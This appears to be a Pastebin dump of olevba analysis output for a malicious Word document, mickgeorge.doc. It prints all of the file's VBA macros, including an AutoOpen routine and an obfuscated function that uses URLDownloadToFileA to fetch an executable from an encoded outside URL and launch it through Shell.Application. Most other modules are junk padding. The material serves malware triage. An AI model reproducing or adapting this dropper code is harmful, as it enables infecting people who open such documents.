Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- mickgeorge.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: mickgeorge.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- atqk_x482mp6v
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function wUmMnysKtPzKQMYpELM(CLjPtJqwPYMso As String) As String
- Dim nwwuzQelPc As Integer
- For nwwuzQelPc = 0 To 0
- If nwwuzQelPc = 5 Then End
- Next nwwuzQelPc
- Dim rUkQQqyoTO As Integer
- For rUkQQqyoTO = 0 To 0
- If rUkQQqyoTO = 5 Then End
- Next rUkQQqyoTO
- Dim jHzvHYnIwFd As Integer
- For jHzvHYnIwFd = 0 To 0
- If jHzvHYnIwFd = 5 Then End
- Next jHzvHYnIwFd
- For mrdVdHiTjnq = 1 To Len(CLjPtJqwPYMso) Step 2
- Dim lvBxJabwy As Integer
- For lvBxJabwy = 0 To 0
- If lvBxJabwy = 5 Then End
- Next lvBxJabwy
- Dim DrdEbaB As Integer
- For DrdEbaB = 0 To 0
- If DrdEbaB = 5 Then End
- Next DrdEbaB
- Dim luGjCiFYkYOhfBlvBxJabw As Integer
- For luGjCiFYkYOhfBlvBxJabw = 0 To 0
- If luGjCiFYkYOhfBlvBxJabw = 5 Then End
- Next luGjCiFYkYOhfBlvBxJabw
- Dim CwOLiEd As Integer
- For CwOLiEd = 0 To 0
- If CwOLiEd = 5 Then End
- Next CwOLiEd
- Dim CiFYkY As Integer
- For CiFYkY = 0 To 0
- If CiFYkY = 5 Then End
- Next CiFYkY
- Dim jAmrQrCwO As Integer
- For jAmrQrCwO = 0 To 0
- If jAmrQrCwO = 5 Then End
- Next jAmrQrCwO
- wUmMnysKtPzKQMYpELM = wUmMnysKtPzKQMYpELM & Mid(CLjPtJqwPYMso, mrdVdHiTjnq, 1)
- Dim dSVNmPusaOj As Integer
- For dSVNmPusaOj = 0 To 0
- If dSVNmPusaOj = 5 Then End
- Next dSVNmPusaOj
- Dim TjbLtvPsKVqDrdEb As Integer
- For TjbLtvPsKVqDrdEb = 0 To 0
- If TjbLtvPsKVqDrdEb = 5 Then End
- Next TjbLtvPsKVqDrdEb
- Dim eCgKvq As Integer
- For eCgKvq = 0 To 0
- If eCgKvq = 5 Then End
- Next eCgKvq
- Dim lAHJSqlOQxDQ As Integer
- For lAHJSqlOQxDQ = 0 To 0
- If lAHJSqlOQxDQ = 5 Then End
- Next lAHJSqlOQxDQ
- Dim aQtPotqBET As Integer
- For aQtPotqBET = 0 To 0
- If aQtPotqBET = 5 Then End
- Next aQtPotqBET
- Dim DziwVVw As Integer
- For DziwVVw = 0 To 0
- If DziwVVw = 5 Then End
- Next DziwVVw
- Next
- Dim QRGbRI As Integer
- For QRGbRI = 0 To 0
- If QRGbRI = 5 Then End
- Next QRGbRI
- Dim YosvmLbSDlnI As Integer
- For YosvmLbSDlnI = 0 To 0
- If YosvmLbSDlnI = 5 Then End
- Next YosvmLbSDlnI
- Dim ETpqzJEix As Integer
- For ETpqzJEix = 0 To 0
- If ETpqzJEix = 5 Then End
- Next ETpqzJEix
- Dim MIUlAHJSql As Integer
- For MIUlAHJSql = 0 To 0
- If MIUlAHJSql = 5 Then End
- Next MIUlAHJSql
- Dim JgEwsEU As Integer
- For JgEwsEU = 0 To 0
- If JgEwsEU = 5 Then End
- Next JgEwsEU
- Dim SklGHRpVzP As Integer
- For SklGHRpVzP = 0 To 0
- If SklGHRpVzP = 5 Then End
- Next SklGHRpVzP
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function CBGrxFVwvLB()
- End Function
- Private Sub ydbIxRHyMQFFstTpRlPo()
- End Sub
- Private Sub DxPMkTekgsI()
- End Sub
- Public Sub qNvYoU()
- End Sub
- Private Sub rYSSRQHAHmM()
- End Sub
- Public Function UMlOtdZNiZPdnV()
- End Function
- Public Sub QtFTBSEIj()
- End Sub
- Private Function geAVuAwILavxG()
- End Function
- Public Function EQrKEuajinYQYCPfildBQJuceybg()
- End Function
- Private Sub maLnJIkRjUZzalf()
- End Sub
- Private Function mLDzKcrMAJhcFH()
- End Function
- Public Sub VKqzAyDbhoSgfzBtSiaKsu()
- End Sub
- Private Function ifNbAAckxZtYwN()
- End Function
- Private Function TmUrb()
- End Function
- Public Function zQgnpyVQ()
- End Function
- Public Function jCKzf()
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO dfsdfsdffdgdhbvdfe3.bas
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/dfsdfsdffdgdhbvdfe3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function àðàâàûâà Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As LongPtr, _
- ByVal UYG78t78GIUsfg As String, _
- ByVal UYG78t78GIUsfgf As String, _
- ByVal UYG78t78GIUsfgfd As Long, _
- ByVal UYG78t78GIUsfgfds As LongPtr) As LongPtr
- #Else
- Private Declare Function àðàâàûâà Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal UYG78t78GIUsfgd As Long, _
- ByVal UYG78t78GIUsfg As String, _
- ByVal UYG78t78GIUsfgf As String, _
- ByVal UYG78t78GIUsfgfd As Long, _
- ByVal UYG78t78GIUsfgfds As Long) As Long
- #End If
- Function îãøïãøùèäàâ(z0ktwRXRQZl2qo0_ As String, âàûâàûâïóê As String) As Boolean
- vJHKBJdfkgfg = àðàâàûâà(0&, z0ktwRXRQZl2qo0_, âàûâàûâïóê, 0&, 0&)
- Set âûïàâïàâóöà = CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110))
- âûïàâïàâóöà.Open Environ(wUmMnysKtPzKQMYpELM(Chr$(84) & Chr$(57) & Chr$(77) & Chr$(104) & Chr$(80) & Chr$(38))) & wUmMnysKtPzKQMYpELM(Chr$(92) & Chr$(61) & Chr$(51) & Chr$(39) & Chr$(50) & Chr$(134) & Chr$(52) & Chr$(122) & Chr$(50) & Chr$(57) & Chr$(51) & Chr$(51) & Chr$(53) & Chr$(95) & Chr$(50) & Chr$(64) & Chr$(51) & Chr$(84) & Chr$(53) & Chr$(96) & Chr$(46) & Chr$(88) & Chr$(101) & Chr$(111) & Chr$(120) & Chr$(44) & Chr$(101) & Chr$(45))
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function vzBtSi()
- End Function
- Public Sub uOrwJGpC()
- End Sub
- Private Sub LZAUzYpPqBv()
- End Sub
- Public Function DNTPcsHOQaxsVY()
- End Function
- Private Function mbGCC()
- End Function
- Public Sub xFVwvLBE()
- End Sub
- Public Function dbIxRHyMQF()
- End Function
- Private Sub TdpRlPoGR()
- End Sub
- Private Sub PMkTekgsIJ()
- End Sub
- Private Function NvYoUbuCYSSRQHAH()
- End Function
- Private Sub ORUMlOtdZN()
- End Sub
- Private Sub dnVVJvQtFTBSE()
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function NiZPdnVVJvQtFTB()
- End Function
- Private Sub jQTNgeAVuAwI()
- End Sub
- Private Function xGQLpEQrK()
- End Function
- Private Function jkinY()
- End Function
- Private Sub POfildBQJuc()
- End Sub
- Public Function gtDZmLnJIk()
- End Function
- Public Sub ZzalfxuQmLDzKcr()
- End Sub
- Private Sub hcFHoHNVKqzA()
- End Sub
- Public Function hoSgf()
- End Function
- Public Function tSiaKsuOrwGpCccDLZAUzY()
- End Function
- Private Function BvNwTDNT()
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub atqk_x482mp6v()
- îãøïãøùèäàâ wUmMnysKtPzKQMYpELM("hltEt<p=::/C/'s4cAhal1a/gNh;a@u0f`e4ro.kdHe2/ZjGs5/PbdiCnB.*e*x^eo"), Environ(wUmMnysKtPzKQMYpELM("T9MhP&")) & wUmMnysKtPzKQMYpELM("\=3'2†4z29335_2@3T5`.Xeox,e-")
- End Sub
- Public Function ILavxGQLp()
- End Function
- Private Sub KEuajkin()
- End Sub
- Private Sub CPOfildBQJuceyb()
- End Sub
- Private Sub ZmaLnJIkRjU()
- End Sub
- Private Sub lfxuQ()
- End Sub
- Private Function zKcrMAJhcFH()
- End Function
- Public Function VKqzAyDbhoSgf()
- End Function
- Public Function tSiaKsuOrw()
- End Function
- Private Function CccDLZAU()
- End Function
- Private Function PqBvNwTD()
- End Function
- Public Sub csHOQaxsVYEKe()
- End Sub
- Public Function CCBGrxFVwvLB()
- End Function
- Public Sub ydbIxRHyMQFFstT()
- End Sub
- Public Function lPoGRGDxPMkTek()
- End Function
- Private Function JfhqNvYoUbuC()
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+---------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+---------------------------------------+
- | Suspicious | Environ | May read system environment variables |
- +------------+---------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function EQrKEuajinYQYCP()
- End Function
- Public Function ldBQJu()
- End Function
- Public Function bgtDZmaLnJ()
- End Function
- Public Sub jUZzalfxuQmLDz()
- End Sub
- Private Sub MAJhcFHo()
- End Sub
- Private Function KqzAyDbhoSgfvzB()
- End Function
- Public Sub aKsuOr()
- End Sub
- Private Function pCccDLZAUzYp()
- End Function
- Public Function vNwTDNTPcs()
- End Function
- Private Sub axsVYEKembGCCB()
- End Sub
- Private Function FVwvLBEwUy()
- End Function
- Private Function xRHyMQFFstTd()
- End Function
- Public Function PoGRGDx()
- End Function
- Private Sub TekgsIJ()
- End Sub
- Private Function NvYoUbuCYSSRQHAHMyORUMl()
- End Function
- Public Sub ZNiZPnVVJv()
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Class3.cls
- in file: mickgeorge.doc - OLE stream: u'Macros/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function QFFstTdpRlPoG()
- End Function
- Private Sub xPMkTekgsIJ()
- End Sub
- Private Function NvYoUbuC()
- End Function
- Private Function SRQHAHmMyORUMl()
- End Function
- Private Function ZNiZP()
- End Function
- Public Function VJvQtFTBSEIjQTN()
- End Function
- Private Function VuAwILavxG()
- End Function
- Private Sub EQrKEuaj()
- End Sub
- Private Sub YQYCPOf()
- End Sub
- Private Sub BQJuc()
- End Sub
- Public Sub gtDZm()
- End Sub
- Public Sub JIkRjUZ()
- End Sub
- Private Function fxuQmLD()
- End Function
- Private Function rMAJh()
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement